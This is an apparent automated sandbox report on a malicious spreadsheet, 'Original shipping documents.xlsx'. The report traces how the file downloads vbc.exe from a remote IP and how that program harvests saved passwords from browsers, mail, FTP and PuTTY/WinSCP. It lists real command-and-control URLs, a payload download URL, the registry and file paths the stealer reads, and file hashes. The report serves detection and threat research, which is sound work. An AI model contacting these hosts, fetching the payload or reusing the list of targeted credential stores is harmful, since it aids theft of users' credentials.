              Source: Yara matchFile source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.vbc.exe.3e0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1268, type: MEMORYSTR
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
              Tries to harvest and steal ftp login credentialsShow sources
              Source: C:\Users\Public\vbc.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
              Source: C:\Users\Public\vbc.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
              Source: C:\Users\Public\vbc.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
              Source: C:\Users\Public\vbc.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
              Tries to steal Mail credentials (via file registry)Show sources
              Source: C:\Users\Public\vbc.exeCode function: PopPassword4_2_0040D069
              Source: C:\Users\Public\vbc.exeCode function: SmtpPassword4_2_0040D069
              Tries to steal Mail credentials (via file access)Show sources
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.dbJump to behavior
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.dbJump to behavior
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.dbJump to behavior
              Source: Yara matchFile source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.220e50.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.vbc.exe.3e0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000003.455823492.00000000003E0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsExploitation for Client Execution13Path InterceptionAccess Token Manipulation1Deobfuscate/Decode Files or Information1OS Credential Dumping2Account Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer13Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection12Obfuscated Files or Information3Credentials in Registry2File and Directory Discovery2Remote Desktop ProtocolMan in the Browser1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Software Packing22Security Account ManagerSystem Information Discovery13SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading111NTDSSecurity Software Discovery1Distributed Component Object ModelEmail Collection1Scheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion11LSA SecretsProcess Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsVirtualization/Sandbox Evasion11VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection12DCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              4.2.vbc.exe.220e50.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              4.2.vbc.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              4.1.vbc.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              4.3.vbc.exe.3e0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.%s.comPA0%URL Reputationsafe
              http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
              http://alphastand.win/alien/fre.php0%URL Reputationsafe
              http://alphastand.trade/alien/fre.php0%URL Reputationsafe
              http://checkvim.com/ga14/fre.php100%Avira URL Cloudmalware
              http://103.155.83.184/wdc/vbc.exe0%Avira URL Cloudsafe
              http://alphastand.top/alien/fre.php0%URL Reputationsafe
              http://www.ibsensoftware.com/0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              checkvim.com
              		5.188.89.50
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://kbfvzoboss.bid/alien/fre.phptrue
                • URL Reputation: safe
                		unknown
                http://alphastand.win/alien/fre.phptrue
                • URL Reputation: safe
                		unknown
                http://alphastand.trade/alien/fre.phptrue
                • URL Reputation: safe
                		unknown
                http://checkvim.com/ga14/fre.phptrue
                • Avira URL Cloud: malware
                		unknown
                http://103.155.83.184/wdc/vbc.exetrue
                • Avira URL Cloud: safe
                		unknown
                http://alphastand.top/alien/fre.phptrue
                • URL Reputation: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.%s.comPAvbc.exe, 00000004.00000002.664629094.0000000002700000.00000002.00020000.sdmpfalse
                • URL Reputation: safe
                		low
                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000004.00000002.664629094.0000000002700000.00000002.00020000.sdmpfalse
                  		high
                  http://www.day.com/dam/1.089D14D5A.emf.0.drfalse
                    		high
                    http://www.ibsensoftware.com/vbc.exe, vbc.exe, 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmpfalse
                    • URL Reputation: safe
                    		unknown

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    5.188.89.50
                    		checkvim.comRussian Federation
                    		34665PINDC-ASRUtrue
                    103.155.83.184
                    		unknownunknown
                    		134687TWIDC-AS-APTWIDCLimitedHKtrue

                    General Information

                    Joe Sandbox Version:33.0.0 White Diamond
                    Analysis ID:491904
                    Start date:28.09.2021
                    Start time:06:49:13
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 5m 38s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:Original shipping documents.xlsx
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:6
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.spyw.expl.evad.winXLSX@4/15@142/2
                    EGA Information:Failed
                    HDC Information:
                    • Successful, ratio: 42.6% (good quality ratio 40.8%)
                    • Quality average: 77.2%
                    • Quality standard deviation: 28.8%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .xlsx
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Scroll down
                    • Close Viewer
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    06:50:35API Interceptor72x Sleep call for process: EQNEDT32.EXE modified
                    06:50:43API Interceptor837x Sleep call for process: vbc.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    103.155.83.184Original_Docs_of_272108-27110.xlsxGet hashmaliciousBrowse
                    • 103.155.83.184/winx/vbc.exe
                    Original Docs of 272108-27110.xlsxGet hashmaliciousBrowse
                    • 103.155.83.184/winx/vbc.exe

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    checkvim.comOriginal_Docs_of_272108-27110.xlsxGet hashmaliciousBrowse
                    • 85.192.56.15
                    oGBfcIhLM0.exeGet hashmaliciousBrowse
                    • 85.192.56.15
                    Original Docs of 272108-27110.xlsxGet hashmaliciousBrowse
                    • 85.192.56.15
                    4jiyRFGk2g.exeGet hashmaliciousBrowse
                    • 85.192.56.15
                    2WcXz6F1Fg.exeGet hashmaliciousBrowse
                    • 94.247.137.137
                    WjOPMprn5p.exeGet hashmaliciousBrowse
                    • 94.247.137.137
                    u2dPHHMOK8.exeGet hashmaliciousBrowse
                    • 94.247.137.137
                    _(BL,INV,)Cargo receipts_.xlsxGet hashmaliciousBrowse
                    • 176.119.147.198
                    f32OEHkj7R.exeGet hashmaliciousBrowse
                    • 94.247.137.151
                    KXaSOvIYKB.exeGet hashmaliciousBrowse
                    • 94.247.137.151
                    Revised Proforma Twinkle diamond..xlsxGet hashmaliciousBrowse
                    • 94.247.137.151
                    kCqS8blL7C.exeGet hashmaliciousBrowse
                    • 5.180.136.169
                    qucqDCe82D.exeGet hashmaliciousBrowse
                    • 5.180.136.169
                    xbFyi3wvv6.exeGet hashmaliciousBrowse
                    • 5.180.136.169
                    SWSJZS3u3T.exeGet hashmaliciousBrowse
                    • 5.180.136.169
                    vbc.exeGet hashmaliciousBrowse
                    • 5.180.136.169
                    hBU2Qo8plP.exeGet hashmaliciousBrowse
                    • 185.195.24.226
                    _Cargo receipts BL,INV_.xlsxGet hashmaliciousBrowse
                    • 185.195.24.226
                    lse63kj8fX.exeGet hashmaliciousBrowse
                    • 185.251.89.218
                    MqfdQNyVU9.exeGet hashmaliciousBrowse
                    • 185.251.89.218

                    ASN

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    TWIDC-AS-APTWIDCLimitedHKOriginal_Docs_of_272108-27110.xlsxGet hashmaliciousBrowse
                    • 103.155.83.184
                    Original Docs of 272108-27110.xlsxGet hashmaliciousBrowse
                    • 103.155.83.184
                    A4B51BD72DFFD28AD3841217FFEC9E43D21EE3C6F889B.exeGet hashmaliciousBrowse
                    • 103.155.93.196
                    05BB79760B2D993C39D526717DA95AEC99AD74D8FC23E.exeGet hashmaliciousBrowse
                    • 103.155.93.196
                    setup_x86_x64_install.exeGet hashmaliciousBrowse
                    • 103.155.93.196
                    AA9830B26F9C0DB4C3DA3C04A96199550B57251B56F8C.exeGet hashmaliciousBrowse
                    • 103.155.93.196
                    IYtpAQqaaN.exeGet hashmaliciousBrowse
                    • 103.155.93.196
                    s5A7MjLIUaGet hashmaliciousBrowse
                    • 103.155.241.218
                    AWS QOUTATION 768854_SCAN_PDF.exeGet hashmaliciousBrowse
                    • 103.156.92.178
                    IH8yGKHMaAGet hashmaliciousBrowse
                    • 103.154.227.106
                    doc0490192021092110294.exeGet hashmaliciousBrowse
                    • 103.159.52.4
                    AW QUOTE HQ2-scan-0983.exeGet hashmaliciousBrowse
                    • 103.156.92.178
                    Document_1752244602-Copy.xlsGet hashmaliciousBrowse
                    • 103.155.92.211
                    Document_1752244602-Copy.xlsGet hashmaliciousBrowse
                    • 103.155.92.211
                    Document_1752244602-Copy.xlsGet hashmaliciousBrowse
                    • 103.155.92.211
                    AW QUOTE 21505 HQ1-Scan-068703_PDF.exeGet hashmaliciousBrowse
                    • 103.156.92.178
                    AW QUOTE 21505 HQ1-Scan-068703_PDF.exeGet hashmaliciousBrowse
                    • 103.156.92.178
                    qbot5.xlsxGet hashmaliciousBrowse
                    • 103.155.92.211
                    qbot5.xlsxGet hashmaliciousBrowse
                    • 103.155.92.211
                    qbot5.xlsxGet hashmaliciousBrowse
                    • 103.155.92.211
                    PINDC-ASRUSetup.exeGet hashmaliciousBrowse
                    • 5.188.89.12
                    6MC579H2Rk.exeGet hashmaliciousBrowse
                    • 5.188.88.214
                    ulWBwQ4cF0.exeGet hashmaliciousBrowse
                    • 5.188.88.214
                    TpW0kSiexY.exeGet hashmaliciousBrowse
                    • 146.185.239.48
                    t2fi2uDNOmGet hashmaliciousBrowse
                    • 5.188.210.153
                    mk61kzqC1Z.exeGet hashmaliciousBrowse
                    • 5.188.89.24
                    de8d7941d5fe91459cefc134f86c2630dbea5ec6830e2.exeGet hashmaliciousBrowse
                    • 5.188.89.24
                    w3hJTUzSUs.exeGet hashmaliciousBrowse
                    • 5.188.89.24
                    Q3 order 455647483 10-09-2021 document.exeGet hashmaliciousBrowse
                    • 31.184.204.91
                    z2SUzJkpaW.exeGet hashmaliciousBrowse
                    • 5.188.88.47
                    v6w61X9rOS.exeGet hashmaliciousBrowse
                    • 5.188.88.47
                    yXf9mhlpKV.exeGet hashmaliciousBrowse
                    • 5.188.88.47
                    hkfp0p5kuE.exeGet hashmaliciousBrowse
                    • 5.188.88.63
                    3hTS09wZ7G.exeGet hashmaliciousBrowse
                    • 5.188.88.63
                    040ba58b824e36fc9117c1e3c8b651d9e4dc3fe12b535.exeGet hashmaliciousBrowse
                    • 5.188.88.63
                    89o9iHBGiB.exeGet hashmaliciousBrowse
                    • 5.188.88.63
                    DWVByMCYL8.exeGet hashmaliciousBrowse
                    • 5.188.88.63
                    DUpgpAnHkq.exeGet hashmaliciousBrowse
                    • 5.188.88.63
                    7EAz8cQ49v.exeGet hashmaliciousBrowse
                    • 5.188.88.63
                    f9aoawyl4M.exeGet hashmaliciousBrowse
                    • 5.188.88.63

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:downloaded
                    Size (bytes):210432
                    Entropy (8bit):6.97232515193582
                    Encrypted:false
                    SSDEEP:3072:2v+ArX9FLxOhanZBsX3PovEuKwEXLqfP6GB6klGfLIQVNWBz:6+KnIanZyHPoqqfSGB6k8Txql
                    MD5:59A67B5CCF01B6A564265797DC5E53E8
                    SHA1:996281D368FCC2CEFE5BF99399CCB19299C6F8FF
                    SHA-256:E4C1C0121487F83B014B8C81BBAF03DB0B7F49584A268A5E67CA64BA6E64676F
                    SHA-512:3BEB988E323C9A9F8DEB04E845DA157E34EC1F564B5CF8681A7ACA490A9FB5A1D4F1D4A10D80AD2D9C7D1742C56B93CFD113352FA80E38C4BAB46695C6F527CD
                    Malicious:true
                    Reputation:low
                    IE Cache URL:http://103.155.83.184/wdc/vbc.exe
                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L...H..`.................l........................@.................................mk..................................O...,...<.... ...u..............................................................@...............|............................text... j.......l.................. ..`.rdata...1.......2...p..............@..@.data...|U..........................@....rsrc....u... ...v..................@..@........................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1599A1F2.jpeg
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                    Category:dropped
                    Size (bytes):8815
                    Entropy (8bit):7.944898651451431
                    Encrypted:false
                    SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                    MD5:F06432656347B7042C803FE58F4043E1
                    SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                    SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                    SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\34C1CE78.jpeg
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                    Category:dropped
                    Size (bytes):14198
                    Entropy (8bit):7.916688725116637
                    Encrypted:false
                    SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                    MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                    SHA1:72CA86D260330FC32246D28349C07933E427065D
                    SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                    SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FC47675.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):33795
                    Entropy (8bit):7.909466841535462
                    Encrypted:false
                    SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                    MD5:613C306C3CC7C3367595D71BEECD5DE4
                    SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                    SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                    SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\46679E8F.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 484 x 544, 8-bit/color RGB, non-interlaced
                    Category:dropped
                    Size (bytes):65050
                    Entropy (8bit):7.959940260382877
                    Encrypted:false
                    SSDEEP:1536:LT3dRSPKeePekFnfpQ6uF2sxiPfqu2RjWn0ZqNnbMXrpLlx6q1F:fdoPI79fpQXtjupn7Nnb8pLll
                    MD5:22335141D285E599CDAEF99EABA59D5B
                    SHA1:C8E5F6F30E91F2C55D96867CAA2D1E21E7A4804D
                    SHA-256:6C0757667F548698B721E4D723768447046B509C1777D6F1474BDE45649D92B0
                    SHA-512:CF623DC74B631AAE3DBECF1F8D7E6E129F0C44F882487F367F4CB955A3D5A9AAE96EFD77FB0843BCE84F5F9D4A3C844A42193B7C4F1D374CE147399E1C3A6C2B
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: .PNG........IHDR....... ......]....b.zTXtRaw profile type exif..x..Y..8.].9.........L3....UFvU&.d..|q.;..f..^...........j.W..^...RO=..C.....=......N..).._......=........./...........?....Cl.>.......7...~....'..<...W..{o......q..5~..O.;U.ce>.W.Oxn...-.O......w..I........v..s&.|x....:......?..u.??P....y.....}q..'..}.?...........}.j..o...I...K......G.._+.U...?..W..+Nnlq.....z....RX.._...3L.1..9.........8.$.._.\....Ln....%.....fh|...d.|X.7........_....StC......+*.<.7...S\H...i>.{...Nn....../.....#..d.9...s.N..S.P...........Kxr(.1..8....<y|R..@.9.p}......E.....l......"?.Ui....RF~jj.....s...{~.SR..Z.Qo}j...Zk....i..VZm......LX......./..../?.#.g..G.u...;...f.e..f...Y..*.^.....6.................}.{.vk............[...........G..I.....7^...:zgw.)Eo.;.{D)r..B.rV....C._....us..]9...[..n...._...........sk.=..9...z...a......e.7.<Vm;....s.w....o./kq.y.w..:q`;..A({.}...w~<.S..WJ.).Zz.c.#`.xN...1.9..1...k.o. ..-.M|....,..i.[.\.;......8...x.
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\58670744.jpeg
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                    Category:dropped
                    Size (bytes):14198
                    Entropy (8bit):7.916688725116637
                    Encrypted:false
                    SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                    MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                    SHA1:72CA86D260330FC32246D28349C07933E427065D
                    SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                    SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                    Malicious:false
                    Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6C7DD346.jpeg
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                    Category:dropped
                    Size (bytes):8815
                    Entropy (8bit):7.944898651451431
                    Encrypted:false
                    SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                    MD5:F06432656347B7042C803FE58F4043E1
                    SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                    SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                    SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                    Malicious:false
